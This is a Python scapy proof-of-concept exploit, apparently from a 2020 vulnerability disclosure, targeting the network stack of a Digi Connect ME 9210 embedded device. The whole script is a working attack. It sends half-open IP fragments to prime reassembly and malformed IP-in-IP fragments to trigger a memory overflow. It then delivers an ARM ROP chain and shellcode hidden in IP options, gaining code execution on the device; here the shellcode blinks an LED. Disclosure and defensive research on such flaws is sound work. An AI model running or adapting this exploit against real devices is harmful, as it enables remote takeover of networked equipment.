# Copyright (c) 2020 JSOF Ltd.
# Available under MIT License
#
# Authors: Moshe Kol, Shlomi Oberman

from scapy.all import *
import argparse
import threading
import struct

# Verbosity for vprint and the log_* helpers; 0 keeps them silent.
# The __main__ block overwrites it with the -v/--verbose count.
VERBOSE_LEVEL = 0

# Cooperative stop flags polled by the Attack sender loops; they are set to
# True once a timed run's timeout expires.
MALFORMED_THREAD_FLAG = BENIGN_THREAD_FLAG = False

# The script sleeps FRAG_TTL + 1 seconds while waiting for incomplete
# fragments to expire on the target; presumably the target's reassembly
# timeout in seconds -- TODO confirm against the device.
FRAG_TTL = 4

def vprint(*args, **kwargs):
    """Forward all arguments to ``print`` only when VERBOSE_LEVEL is positive."""
    if VERBOSE_LEVEL <= 0:
        return
    print(*args, **kwargs)

def log_status(*args, **kwargs):
    """Emit a status line prefixed with "[x]" through vprint."""
    prefixed = ("[x]",) + args
    vprint(*prefixed, **kwargs)

def log_success(*args, **kwargs):
    """Emit a success line prefixed with "[+]" through vprint."""
    prefixed = ("[+]",) + args
    vprint(*prefixed, **kwargs)

def log_failure(*args, **kwargs):
    """Emit a failure line prefixed with "[-]" through vprint."""
    prefixed = ("[-]",) + args
    vprint(*prefixed, **kwargs)

def log_info(*args, **kwargs):
    """Emit an informational line prefixed with "[*]" through vprint."""
    prefixed = ("[*]",) + args
    vprint(*prefixed, **kwargs)

def log_warning(*args, **kwargs):
    """Emit a warning line prefixed with "[!]" through vprint."""
    prefixed = ("[!]",) + args
    vprint(*prefixed, **kwargs)

def log_debug(*args, **kwargs):
    """Emit a debug line prefixed with "[DEBUG]" through vprint."""
    prefixed = ("[DEBUG]",) + args
    vprint(*prefixed, **kwargs)

def p32(b):
    """Pack *b* as a 4-byte unsigned integer in network (big-endian) order."""
    # "!" is network byte order with standard sizes -- identical to ">".
    packed = struct.pack("!I", b)
    return packed

# Desired allocation size (bytes) -> UDP payload size (bytes) of the benign
# packets built by Attack.send_benign_udp. Attack.overflow indexes this table
# with ``allocation_size << 1``, so its default of 0x100 selects the 0x200 row.
PAYLOAD_SIZES = {
    0x100: 4,    # 256-byte allocation
    0x200: 120,  # 512-byte allocation
    0x400: 400,  # 1024-byte allocation
}

class Attack:
    """Packet sender for the staged Digi Connect ME 9210 proof of concept.

    All packets go out through one scapy layer-3 socket opened in
    ``__init__``. ``attack`` builds the ROP chain and shellcode and then runs
    ``stage_1``, ``stage_2`` and ``stage_3`` in that order.

    NOTE(review): the ``*_ex`` helpers stop their sender threads through the
    module-level globals BENIGN_THREAD_FLAG / MALFORMED_THREAD_FLAG. Those are
    set to True after a timed run and never reset to False, so a second timed
    run in the same process stops each sender after its first iteration.
    NOTE(review): ``time`` is used here but is not imported explicitly in the
    visible imports; it presumably comes from ``from scapy.all import *`` --
    an explicit ``import time`` would be more robust.
    """
    def __init__(self, iface, ip_dst, udp_dport, udp_sport):
        """Record the target parameters and open the shared send socket.

        :param iface: interface passed to ``conf.L3socket`` (the CLI passes
            ``None`` when ``-i`` is not given).
        :param ip_dst: destination address used for every packet sent.
        :param udp_dport: UDP destination port of benign and malformed packets.
        :param udp_sport: UDP source port of benign and malformed packets.
        """
        self.iface = iface
        self.ip_dst = ip_dst
        self.udp_dport = udp_dport
        self.udp_sport = udp_sport

        self.sock = conf.L3socket(iface=iface)

    def send_benign_udp(self, payload_size, count):
        """Send one fixed, well-formed UDP datagram repeatedly.

        The datagram carries ``payload_size`` bytes of ``b'X'``. It is sent
        ``count`` times, or indefinitely when ``count`` is negative. The
        global BENIGN_THREAD_FLAG is polled after every send and ends the
        loop early once it is True.
        """
        global BENIGN_THREAD_FLAG

        pkt = IP(dst=self.ip_dst)
        pkt /= UDP(sport=self.udp_sport, dport=self.udp_dport)
        pkt /= (b'X'*payload_size)

        it_num = 0
        while count < 0 or it_num < count:
            self.sock.send(pkt)

            it_num += 1

            if BENIGN_THREAD_FLAG:
                break
    
    def send_benign_udp_ex(self, payload_size, count, timeout, thread_count=4):
        """Send benign UDP datagrams from ``thread_count`` parallel threads.

        Each thread runs ``send_benign_udp`` with ``count // thread_count``
        packets (a negative ``count`` stays negative, i.e. unbounded). When
        ``timeout > 0`` this call sleeps ``timeout`` seconds and then sets
        BENIGN_THREAD_FLAG so the senders stop; it always joins all threads.

        NOTE(review): with ``count >= 0`` the remainder
        ``count % thread_count`` is never sent. The argument checks use
        ``assert`` and are skipped under ``python -O``.
        """
        global BENIGN_THREAD_FLAG
        if count >= 0:
            assert count >= 2*thread_count
        else:
            # An unbounded run can only be stopped by the timeout.
            assert timeout > 0
        log_status("Sending {} benign udp packets with payload size {}".format(count if count >= 0 else "infinite", payload_size))
        
        bthreads = []
        for _ in range(thread_count):
            t = threading.Thread(target=Attack.send_benign_udp,
                                args=(self, payload_size, count//thread_count))
            bthreads.append(t)
            t.start()
        
        if timeout > 0:
            time.sleep(timeout)
            BENIGN_THREAD_FLAG = True
        
        for t in bthreads:
            t.join()
    
    def send_malformed(self, payload, count, delay=0):
        """Repeatedly send a malformed IP-in-IP datagram as two fragments.

        Inner packet: ``IP(len=32) / UDP(len=12, chksum=0) / payload``. The
        length fields are fixed, so with the required payload of at least 12
        bytes the inner packet is longer than its IP and UDP headers declare.

        Outer packets: two IP fragments with ``proto=4`` and a shared id.
        ``frag1`` has MF set (``flags=1``) and carries the first 40 bytes of
        the inner packet; ``frag2`` starts at offset ``40 >> 3`` (offsets are
        in 8-byte units) and carries the remainder.

        Each iteration sends both fragments and then advances the id (starting
        from a random 16-bit value, wrapping at 0x10000). It runs ``count``
        times, or indefinitely when ``count`` is negative, sleeps ``delay``
        seconds between iterations when ``delay > 0``, and stops early once
        the global MALFORMED_THREAD_FLAG is True.
        """
        global MALFORMED_THREAD_FLAG
        # 20-byte IP header + 8-byte UDP header + 12 payload bytes = 40, the
        # size of the slice carried by frag1.
        assert len(payload) >= 12

        iplen = 32
        encap_packet = IP(dst=self.ip_dst, len=iplen)
        encap_packet /= UDP(sport=self.udp_sport, dport=self.udp_dport, chksum=0, len=iplen-20)
        encap_packet /= payload
        
        frag1_data_len = 40
        frag1 = IP(dst=self.ip_dst, frag=0, flags=1, proto=4, id=0)
        frag1 /= bytes(encap_packet)[:frag1_data_len]

        frag2 = IP(dst=self.ip_dst, frag=(frag1_data_len>>3), flags=0, proto=4, id=0)
        frag2 /= bytes(encap_packet)[frag1_data_len:]

        ip_id = int(RandShort())
        it_num = 0
        while count < 0 or it_num < count:
            # Both fragments must share an id to belong to the same datagram.
            frag1[IP].id = ip_id
            frag2[IP].id = ip_id

            self.sock.send(frag1)
            self.sock.send(frag2)

            it_num += 1
            ip_id = (ip_id + 1) % 0x10000

            if delay > 0:
                time.sleep(delay)
            if MALFORMED_THREAD_FLAG:
                break

    def send_malformed_ex(self, payload, count, delay, timeout, thread_count=1):
        """Run ``send_malformed`` on ``thread_count`` parallel threads.

        Every thread gets the full ``count`` (not divided, unlike the benign
        variant) and draws its own starting IP id. When ``timeout > 0`` this
        call sleeps ``timeout`` seconds and then sets MALFORMED_THREAD_FLAG so
        the senders stop; it always joins all threads.

        NOTE(review): the argument check uses ``assert`` and is skipped under
        ``python -O``.
        """
        global MALFORMED_THREAD_FLAG
        if count < 0:
            # An unbounded run can only be stopped by the timeout.
            assert timeout > 0
        log_status("Sending {} malformed packet with payload size {}".format(count if count >= 0 else "infinite", len(payload)))

        mthreads = []
        for _ in range(thread_count):
            t = threading.Thread(target=Attack.send_malformed,
                                args=(self, payload, count, delay))
            mthreads.append(t)
            t.start()
        
        if timeout > 0:
            time.sleep(timeout)
            MALFORMED_THREAD_FLAG = True

        for t in mthreads:
            t.join()

    def overflow(self, payload, malformed_delay, malformed_count=-1, malformed_thread_count=1, benign_count=-1, benign_thread_count=1, timeout=5, allocation_size=0x100):
        """Send benign and malformed traffic concurrently, then wait for both.

        Starts ``send_benign_udp_ex`` (payload size
        ``PAYLOAD_SIZES[allocation_size << 1]``) and ``send_malformed_ex``
        (with ``payload``) on two threads. When ``timeout > 0`` each of them
        sleeps ``timeout`` seconds and then raises its own stop flag.

        NOTE(review): ``allocation_size << 1`` must be a key of PAYLOAD_SIZES;
        e.g. ``allocation_size=0x400`` looks up 0x800 and raises KeyError
        while the thread arguments are being built.
        """
        log_info("Timeout: {}".format(timeout))
        bthread = threading.Thread(target=Attack.send_benign_udp_ex,
                                    args=(self, PAYLOAD_SIZES[allocation_size << 1], benign_count, timeout, benign_thread_count))
        bthread.start()

        mthread = threading.Thread(target=Attack.send_malformed_ex,
                                    args=(self, payload, malformed_count, malformed_delay, timeout, malformed_thread_count))
        mthread.start()

        bthread.join()
        mthread.join()

    def stage_1(self, icmp_count=32):
        """Stage 1: ICMP echo requests followed by never-completed fragments.

        Sends ``icmp_count`` ICMP echo requests. It then sends five IP/ICMP
        packets with the MF flag set (ids 1-5) and waits ``FRAG_TTL + 1``
        seconds. Finally it sends two more (ids 6-7) and waits again. No
        further fragments are ever sent for those ids.
        """
        log_status("===== Stage 1 =====")
        log_status("Sending {} ICMP echo request packets...".format(icmp_count))
        echo_request = IP(dst=self.ip_dst)/ICMP()

        for _ in range(icmp_count):
            self.sock.send(echo_request)
        
        log_success("Finish ICMP echo request")

        log_status("Sending 5 half-open fragments...")
        half_frag_echo_request = IP(dst=self.ip_dst, flags=1)/ICMP()
        for ip_id in range(1,6):
            half_frag_echo_request[IP].id = ip_id
            self.sock.send(half_frag_echo_request)
        log_status("Waiting for fragment reassembly time exceeded...")
        time.sleep(FRAG_TTL + 1)

        log_status("Sending 2 half-open fragments...")
        for ip_id in range(6,8):
            half_frag_echo_request[IP].id = ip_id
            self.sock.send(half_frag_echo_request)
        log_status("Waiting for fragment reassembly time exceeded...")
        time.sleep(FRAG_TTL + 1)
    
    def stage_2(self, address):
        """Stage 2: run ``overflow`` with a payload ending in ``address - 0xa0``.

        The payload is 92 filler bytes, three fixed big-endian words and the
        adjusted address. It is sent for 5 seconds with unbounded benign and
        malformed packet counts and a 1 ms delay between malformed iterations.
        """
        log_status("===== Stage 2 =====")
        # The ROP chain needs to be written at the given address, so the
        # address is adjusted (by 0xa0) before it goes into the payload.
        address = address - 0xa0
        payload = b'A'*92 + p32(0x111) + p32(0x108) + p32(0x100) + p32(address)
        self.overflow(payload,
                      malformed_delay=0.001,
                      malformed_count=-1,
                      malformed_thread_count=1,
                      benign_count=-1,
                      benign_thread_count=1,
                      timeout=5)

    def stage_3(self, rop):
        """Stage 3: deliver ``rop`` inside incomplete IP/ICMP fragments.

        After a 1 s pause, builds one IP packet with ``ihl=0xf`` (a 60-byte
        header, i.e. 40 option bytes), MF set and ``proto=1`` (ICMP). The
        options hold 4 zero bytes followed by ``rop[:36]``; the rest of
        ``rop`` is the packet body. The packet is sent three times with ids
        0x8000-0x8002.

        NOTE(review): if ``len(rop) < 36`` the options are shorter than the 40
        bytes that ``ihl=0xf`` implies.
        """
        assert len(rop) % 4 == 0
        log_status("===== Stage 3 =====")
        time.sleep(1)
        log_status("Sending half-open IP packet fragments to generate ICMP error and drop ROP chain")
        pkt = IP(ihl=0xf, dst=self.ip_dst, flags=1, proto=1, options=[b'\x00\x00\x00\x00' + rop[:36]])
        pkt /= rop[36:]
        for ip_id in range(0x8000, 0x8000+3):
            pkt[IP].id = ip_id
            self.sock.send(pkt)

    def attack(self, stage=0):
        """Build the ROP chain + shellcode, then run stages 1, 2 and 3.

        NOTE(review): ``stage`` is accepted (and exposed as ``--stage`` on the
        command line) but never read; all three stages always run.
        """
        log_status("Attacking Digi Connect ME 9210...")

        # Led 2 blinks indefinitely
        # shellcode size: 0x54
        shellcode = b'\xe5\x9f\x80\x44\xe5\x9f\x90\x44\xe3\xa0\x00\x00\xe3\xa0\x10\x01'
        shellcode += b'\xe3\xa0\x20\x00\xe1\xa0\xe0\x0f\xe1\x2f\xff\x18\xe3\xa0\x00\x64'
        shellcode += b'\xe1\xa0\xe0\x0f\xe1\x2f\xff\x19\xe3\xa0\x00\x00\xe3\xa0\x10\x01'
        shellcode += b'\xe3\xa0\x20\x01\xe1\xa0\xe0\x0f\xe1\x2f\xff\x18\xe3\xa0\x00\x64'
        shellcode += b'\xe1\xa0\xe0\x0f\xe1\x2f\xff\x19\xea\xff\xff\xee\x00\x02\x83\x94'
        shellcode += b'\x00\x06\x28\x5c'

        # Address handed to stage_2; the chain is assumed to start here, and
        # shellcode_address below is computed from it.
        stack_address_to_overwrite = 0x1a5330

        gadget1 = 0x0002f95c # 0x0002f95c: mov r2, r5; mov lr, pc; bx r7; 
        gadget2 = 0x0002f954 # 0x0002f954: mov r0, r4; mov r1, r6; mov r2, r5; mov lr, pc; bx r7; 
        gadget3 = 0x00034ec8 # 00034ec8 e1 2f ff 18     bx         r8
        gadget4 = 0x0000681c # 0000681c e8 bd 8f f1     ldmia      sp!,{r0 r4 r5 r6 r7 r8 r9 r10 r11 pc }
        gadget5 = 0x000d1c84 # mov lr, pc; bx r3; mov r0, r4; pop {r4, pc}; 
        gadget6 = 0x000267e4 # pop {r0, r1, r2, r3, r4, r5, r6, r7, r8, sb, sl, fp, ip, lr}; mov pc, lr; 

        memcpy = 0x0000674c # memcpy address after push register
        tfTcpRestart2Msl = 0x0004a8ac
        ProcessorGpioSetOutputValue = 0x00028394
        tx_thread_sleep = 0x0006285c
        # Only gadget1, gadget5, gadget6, memcpy and tx_thread_sleep are used
        # in the chain below. ProcessorGpioSetOutputValue and tx_thread_sleep
        # also appear, big-endian, as the last 8 bytes of the shellcode.
        # gadget2-4 and tfTcpRestart2Msl are unused.

        # Each word's trailing comment names the register it is loaded into.
        rop = bytearray()
        rop += p32(stack_address_to_overwrite + 44) # r0
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(memcpy) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(gadget1) # pc

        rop += p32(0) # r0
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(0) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(gadget6) # pc

        rop += p32(100) # r0
        rop += p32(0) # r1
        rop += p32(0) # r2
        rop += p32(tx_thread_sleep) # r3
        rop += p32(0) # r4
        rop += p32(0) # r5
        rop += p32(0) # r6
        rop += p32(0) # r7
        rop += p32(0) # r8
        rop += p32(0) # r9
        rop += p32(0) # r10
        rop += p32(0) # r11
        rop += p32(0) # r12
        rop += p32(gadget5) # lr

        rop += p32(0) # r4
        # Final pc: the address of the first shellcode byte, which directly
        # follows this pc word.
        shellcode_address = stack_address_to_overwrite + len(rop) + 4
        rop += p32(shellcode_address) # pc

        rop += shellcode
        # Backfill the first frame's r5 word (bytes 8..11) with the total
        # chain length minus 44, now that the full length is known.
        rop[8:12] = p32(len(rop) - 44)

        self.stage_1()
        self.stage_2(stack_address_to_overwrite)
        self.stage_3(bytes(rop))

if __name__ == '__main__':
    # Keep scapy quiet; this script does its own verbosity-gated logging.
    conf.verb = 0

    parser = argparse.ArgumentParser()
    add_arg = parser.add_argument
    add_arg('ip_dst', help="destination IP address")
    add_arg('udp_dport', type=int, default=2362, nargs='?',
            help="destination UDP port (Default: 2362 (digiman))")
    add_arg('udp_sport', type=int, default=7, nargs='?',
            help="source UDP port (Default: 7)")
    add_arg('-i', '--iface', default=None, nargs='?',
            help="interface name as shown in scapy's show_interfaces() function")
    # Gateway override:
    #   -og omitted      -> 'use_ip_dst' sentinel, route ip_dst via itself
    #   -og <gateway>    -> route ip_dst via <gateway>
    #   -og (no value)   -> const=None, leave scapy's routing table untouched
    add_arg('-og', '--override-gateway', dest='gw', default='use_ip_dst', const=None, type=str, nargs='?',
            help='override gateway for ip_dst in scapy routing table (Default: override with ip_dst, use -og to disable overriding)')
    add_arg('-v', '--verbose', default=0, action='count',
            help="how much output you'd like")
    # NOTE(review): Attack.attack never reads `stage`; every stage runs regardless.
    add_arg('-s', '--stage', dest='stage', default=0, type=int, help='which stage to invoke (0 for all stages)')

    args = parser.parse_args()

    gateway = args.ip_dst if args.gw == 'use_ip_dst' else (args.gw or None)
    if gateway:
        conf.route.add(host=(args.ip_dst), gw=gateway)

    iface = args.iface
    if iface and iface.isdigit():
        # A numeric -i value is treated as an interface index and resolved to
        # that interface's description.
        iface = IFACES.dev_from_index(int(iface)).description

    # Module-level rebinding, so vprint sees the requested verbosity.
    VERBOSE_LEVEL = args.verbose

    attacker = Attack(iface, args.ip_dst, args.udp_dport, args.udp_sport)
    attacker.attack(stage=args.stage)
